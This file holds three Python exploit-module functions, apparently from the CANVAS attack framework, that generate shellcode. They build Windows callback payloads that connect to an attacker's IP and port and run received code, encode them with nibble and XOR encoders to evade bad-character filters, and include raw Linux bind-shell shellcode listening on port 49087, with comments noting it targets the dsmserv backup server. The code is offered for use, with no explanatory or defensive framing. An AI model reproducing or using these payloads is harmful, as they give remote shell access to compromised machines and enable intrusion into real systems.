def createShellcode(self): sc=shellcodeGenerator.win32() sc.addAttr("findeipnoesp",{"subespval": self.subesp}) #don't mess with eip sc.addAttr("revert_to_self_before_importing_ws2_32", None) sc.addAttr("tcpconnect",{"port":self.callback.port,"ipaddress":self.callback.ip}) sc.addAttr("CreateThreadRecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF sc.addAttr("ExitThread",None) rawshellcode=sc.get() print "[!] RAW Shellcode len: %d bytes" % len(rawshellcode) #first encode to nibble enc = nibble_encoder.intel_nibbleencoder() bad = "" for i in range(ord('A'),ord('Z')+1): #for a-z inclusive, these are badchars bad+=chr(i) enc.setbadstring(bad) rawshellcode = enc.encode(rawshellcode) print "[!] Nibble Encoded Shellcode len: %d bytes" % len(rawshellcode) #then do a xor enconding using the real badstring encoder = xorencoder.simpleXOR() encoder.setbadstring(self.badstring) encoder.find_key(rawshellcode) self.shellcode = encoder.encode(rawshellcode) print "[!] Shellcode len: %d bytes" % len(self.shellcode) if not len(self.shellcode): return None return self.shellcode
def createShellcode(self): if targets[self.version][0].lower().find("linux") > -1: # Shellcode bind port 49087 # # 1/ can't use a callback shellcode because dsmserv dies after the # exploitation. so the connection is broken. # # 2/ the solution is to use a multi shellcode but I'm not yet at # ease with API CANVAS # # TODO: MOSDEF # self.shellcode = "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96\x43\x52\x66\x68\xbf\xbf\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1\xb0\x66\xcd\x80\x93\xb6\x0c\xb0\x03\xcd\x80\x89\xdf\xff\xe1" elif targets[self.version][0].lower().find("windows") > -1: try: self.createSmallWin32Shellcode(self.callback.ip, self.callback.port, subesp=3000) encoder = nibble_encoder.intel_nibbleencoder() encoder.setbadstring(self.badstring) self.shellcode = encoder.encode(self.shellcode) except: self.log( "[!] did you forget to set -l -d on the commandline !?") self.shellcode = "\xcc" * 256 #print "[!] shellcode length is %d bytes"% len(self.shellcode) return self.shellcode
def createShellcode(self): host = self.callback.ip port = self.callback.port self.createWin32Shellcode("", host, port) encoder = nibble_encoder.intel_nibbleencoder() encoder.setbadstring(self.badstring) self.shellcode = encoder.encode(self.shellcode) return self.shellcode